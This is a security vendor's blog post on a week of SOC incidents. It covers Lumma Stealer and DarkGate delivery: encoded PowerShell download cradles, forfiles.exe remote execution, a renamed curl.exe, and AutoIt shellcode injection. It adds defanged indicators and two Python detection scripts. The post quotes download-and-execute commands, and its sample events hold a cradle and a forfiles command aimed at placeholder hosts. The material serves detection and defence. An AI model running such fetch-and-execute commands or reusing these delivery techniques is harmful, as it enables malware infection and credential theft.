Between October 23-30, 2024, Blackpoint’s Security Operations Center (SOC) responded to 722 total incidents across on-premises, Microsoft 365, and Google Workspace protected environments. These incidents involved the likely use by threat actors of:
- Potential Lumma Stealer deployment.
- Potential DarkGate malware deployment.
In this blog, we’ll dive into the details of three select incidents, why they matter for our partners, and possible mitigations using your existing tech stack alongside Blackpoint Cyber’s managed services.
Incident #1: Potential Lumma Stealer Deployment
Topline Takeaways
- Industry target: Technology and Healthcare
- Attacker methods:
- Likely Lumma Stealer
- .zip files as payload
- Encoded PowerShell script
- Recommended mitigations:
- Implement behavior-based monitoring.
- Require the use of secure password managers.
Incident Timeline for 2024-10-26 and 2024-10-30
On October 26, 2024, Blackpoint’s MDR technology alerted to encoded PowerShell being executed from a user account of a Technology partner. Blackpoint’s Active SOC isolated the impacted machine to prevent further malicious activity.
Initial investigation identified that the encoded PowerShell decoded to the following: “iex (iwr hxxps[://]iilp[.]b-cdn[.]net/kolo26.txt -UseBasicParsing).Content”.
Blackpoint’s Advanced Pursuit Group (APG) conducted further analysis and identified that this PowerShell calls out to the URL to retrieve the file “kolo26.txt” and executes its contents. The URL hosted malicious code that assembles the download from five separate variables, retrieves a .zip file, 1shmkv.zip, and saves it as “pg1.zip” in the temp directory. The script then unzips the file and executes the binary ashampo.exe.
On October 30, 2024, Blackpoint’s MDR technology alerted to a file, “updater.exe”, located in the temp folder beneath two obfuscated subfolders on a host of a Healthcare partner. Blackpoint’s SOC isolated the impacted device to prevent further malicious activity.
Initial investigation identified that the threat actor utilized forfiles.exe, a legitimate Windows binary, to execute a remotely hosted resource. The command attempted to execute a file, “Pantok”, only if a file matching “expl*re?.exe” existed within C:\Windows.
Additional analysis identified that the file Pantok was hosted at hxxps[://]cdn-defac13[.]techresource[.]shop/api/reg/Pantok. The file is a previously reported malicious version of cleanmgr.dll. The hash of this file, e2b6e854a400d716e599867276b0cc4ab1dc6ae927cc19db7fde3455cb49dcb6, has been previously attributed to a known downloader that has been used to deploy the Lumma Stealer malware.
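Both delivery patterns above, an encoded PowerShell download cradle and forfiles.exe used to launch a remote resource, are what the behavior-based monitoring recommended below should surface. The following Python is an added example, not Blackpoint’s code: it decodes -EncodedCommand arguments and checks constructed process-creation events against both patterns; the forfiles command line, the benign third event and the placeholder domain are assumptions.

```python
import base64
import re

# Constructed process-creation events (sample data, not from the post). The
# encoded command is our own encoding of the cradle the post quotes, with the
# hosting domain swapped for a placeholder.
CRADLE = "iex (iwr https://cdn.example.invalid/kolo26.txt -UseBasicParsing).Content"

def encode_powershell(script):
    """Encode as -EncodedCommand expects: UTF-16LE text, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_powershell(CRADLE)},
    {"id": 2, "image": r"C:\Windows\System32\forfiles.exe",  # assumed /c payload
     "cmdline": r'forfiles /p C:\Windows /m expl*re?.exe /c "cmd /c start https://cdn.example.invalid/api/reg/Pantok"'},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign
     "cmdline": "powershell.exe -enc " + encode_powershell("Get-Service | Out-File C:\\tmp\\svc.txt")},
]

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)  # encoded-command switch + token
CRADLE_RE = re.compile(r"\b(iex|invoke-expression)\b.*\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I | re.S)
FORFILES_RE = re.compile(r'forfiles.*?/c\s+"?(.*)', re.I)  # the command forfiles runs per matched file

def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """List the Lumma delivery patterns from the post that this event matches."""
    reasons = []
    script = decode_encoded_command(event["cmdline"])
    if script and CRADLE_RE.search(script):
        reasons.append("encoded PowerShell download cradle")
    if event["image"].lower().endswith("forfiles.exe"):
        m = FORFILES_RE.search(event["cmdline"])
        if m and re.search(r"https?://", m.group(1), re.I):
            reasons.append("forfiles.exe launching a remote resource")
    return reasons

def triage(events):
    """Map event id -> reasons, for events that matched at least one pattern."""
    return {e["id"]: r for e in events if (r := classify(e))}
```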
More About Lumma Stealer
Lumma Stealer is a malware-as-a-service (MaaS) that has been advertised on cybercriminal forums since at least 2022. The malware is capable of stealing valuable information, including cryptocurrency wallets, browser extensions, MFA instances, and more.
Lumma Stealer is offered for sale on multiple cybercriminal forums, which makes post-incident attribution more difficult. Information stealers are an attractive option for cybercriminals due to the ability to use and/or monetize the information stolen.
APG Threat Analysis for Lumma Stealer
Blackpoint’s APG assesses that threat actors will likely continue to deploy information stealer malware to organizations to gather sensitive information over the next 12 months.
This assessment is based on attacks observed internally by Blackpoint, such as incidents on August 15, 2024, involving an Industrials partner.
Additionally, the assessment is supported by external reports of incidents that involve the use of Lumma Stealer, such as a reported campaign involving the use of fake CAPTCHA verification to trick users into deploying the Lumma Stealer payload.
Mitigations
- Implement behavior-based monitoring to detect unusual activity patterns, such as suspicious processes attempting to make unauthorized network connections.
- Require the use of secure password managers to make accessing passwords by threat actors more difficult.
Incident #2: Potential DarkGate Deployment
Topline Takeaways
- Industry target: Healthcare
- Attacker methods:
- Fake .pdf for social engineering
- Renamed curl.exe
- AutoIT
- Recommended mitigations:
- Employee security training.
- Scripting language controls.
- Require the use of multi-factor authentication (MFA).
Incident Timeline for 2024-10-29
Blackpoint’s MDR technology alerted to the execution of a JavaScript file, s-boyle-95453.js, on a host of a Healthcare partner. Blackpoint’s SOC isolated the impacted device to prevent further malicious activity and prevent the deployment of a malware payload; however, based on the observed behaviors, it is likely the threat actor had tried to deploy the DarkGate malware.
Initial investigation revealed that the first aspect of the malware’s kill chain was copying C:\Windows\System32\curl.exe to C:\Users\$username\AppData\Local\Temp\SSDZSHQJidoxdNKHDrvc.exe. Then curl was used to download a file, YhFRGtlFJRkn.pdf, from hxxps[://]dbs5.pwods[.]com/download/pdf. This was likely a fake .pdf used to social engineer the user into thinking that they accessed a legitimate file and did not execute a malicious loader.
Further investigation revealed that AutoIt3 executed a malicious script located in an obfuscated folder. The script added a Registry value titled “aafecbg”. The AutoIt script then read that Registry value back and injected its contents as shellcode into MicrosoftEdgeUpdateCore.exe. The injection led to the subsequent callout to threat actor-controlled infrastructure.
Blackpoint’s SOC took swift and aggressive action and isolated the device prior to the malware being executed. However, Logpoint security researchers have previously reported an incident that appears to follow a similar kill chain to this incident, indicating this threat actor had likely attempted to deploy DarkGate.
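The chain above (curl.exe copied to a random name under Temp, a fake .pdf download, AutoIt3 running a script, a Registry value written, injection into MicrosoftEdgeUpdateCore.exe) is easier to catch as a sequence than as isolated events. The following Python is an added example, not Blackpoint’s or Logpoint’s code: it maps each constructed Sysmon-style event to a stage of that chain and alerts when one host shows two or more stages within a time window; the user name, script folder, Registry path, Edge update path and domains are assumed placeholders.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style events (sample data, not from the post). File and value
# names follow the post; user, script folder, registry path, Edge path and domains are placeholders.
T = "C:\\Users\\alice\\AppData\\Local\\Temp\\"
EVENTS = [
    {"host": "WS01", "ts": 100, "type": "process", "original": "curl.exe", "image": T + "SSDZSHQJidoxdNKHDrvc.exe",
     "cmdline": "SSDZSHQJidoxdNKHDrvc.exe -o YhFRGtlFJRkn.pdf https://dl.example.invalid/download/pdf"},
    {"host": "WS01", "ts": 130, "type": "process", "original": "AutoIt3.exe", "image": T + r"kq1\AutoIt3.exe",
     "cmdline": "AutoIt3.exe " + T + r"kq1\test.a3x"},
    {"host": "WS01", "ts": 131, "type": "registry", "image": T + r"kq1\AutoIt3.exe", "target": r"HKCU\Software\placeholder\aafecbg"},
    {"host": "WS01", "ts": 135, "type": "remote_thread", "image": T + r"kq1\AutoIt3.exe",
     "target": r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdateCore.exe"},
    {"host": "WS02", "ts": 200, "type": "process", "original": "curl.exe", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe https://www.example.invalid/"},  # benign: curl run under its own name
]
USER_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.I)

def basename(p):
    return p.rsplit("\\", 1)[-1]

def stage_of(e):
    """Name the DarkGate chain stage this single event represents, or None."""
    img = basename(e["image"]).lower()
    if e["type"] == "process":
        # LOLBin copied under a new name: PE OriginalFileName disagrees with the on-disk name
        if e["original"].lower() == "curl.exe" and img != "curl.exe" and "http" in e["cmdline"]:
            return "renamed curl.exe downloading a file"
        if e["original"].lower() == "autoit3.exe" and USER_TEMP.search(e["cmdline"]):
            return "AutoIt3 running a script from user temp"
    if e["type"] == "registry" and img == "autoit3.exe":
        return "AutoIt3 writing registry value " + basename(e["target"])
    if e["type"] == "remote_thread" and img == "autoit3.exe":
        return "AutoIt3 injecting into " + basename(e["target"])
    return None

def correlate(events, window=600):
    """Per host, keep stages within `window` seconds of the first hit; alert on two or more distinct stages."""
    hits = defaultdict(list)
    for e in sorted(events, key=lambda x: x["ts"]):
        if stage := stage_of(e):
            hits[e["host"]].append((e["ts"], stage))
    alerts = {}
    for host, seen in hits.items():
        stages = [s for ts, s in seen if ts - seen[0][0] <= window]
        if len(set(stages)) >= 2:
            alerts[host] = stages
    return alerts
```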
More About DarkGate
DarkGate malware is a Malware-as-a-Service (MaaS) that has been sold on cybercriminal marketplaces since 2017. DarkGate allows threat actors to perform a number of malicious activities, including keylogging, information theft, deploying additional malware, and gaining persistence on a compromised network.
Threat actors likely find DarkGate an attractive option due to the wide range of capabilities of the tool and the ability to purchase the malware for a single day, a month, or a year of use. The ability to purchase the malware likely results in many threat actors using it, which can make post-incident attribution difficult.
APG Threat Analysis for DarkGate
APG assesses threat actors will continue to target organizations with remote access trojans (RATs), like DarkGate, over the next 12 months.
This assessment is based on previously Blackpoint-observed incidents, such as an April 04, 2024, incident involving a Consumer Cyclicals partner.
The assessment is further supported by external reporting of threat actors using DarkGate malware, including a reported DarkGate campaign that appears to follow a kill chain similar to the incident observed by Blackpoint’s SOC.
Mitigations
- Create and implement employee security training: DarkGate is often delivered via social engineering attacks, so employees should know how to identify potential social engineering tactics and how and when to report them to an incident response authority.
- Minimize the use of scripting languages, or implement strict controls on them, as threat actors rely on scripting languages to deploy malware and conduct other malicious activities.
- Require the use of MFA for all user accounts to add an extra layer of security, which can make it more difficult for threat actors to compromise user accounts.
Conclusion
These incidents underscore the evolving tactics of threat actors and highlight the importance of layered defenses. By leveraging Blackpoint’s MDR technology and following these mitigation strategies, you can bolster your organization’s defenses against these types of attacks. Reach out to Blackpoint’s SOC team for tailored recommendations on how to enhance your cybersecurity posture.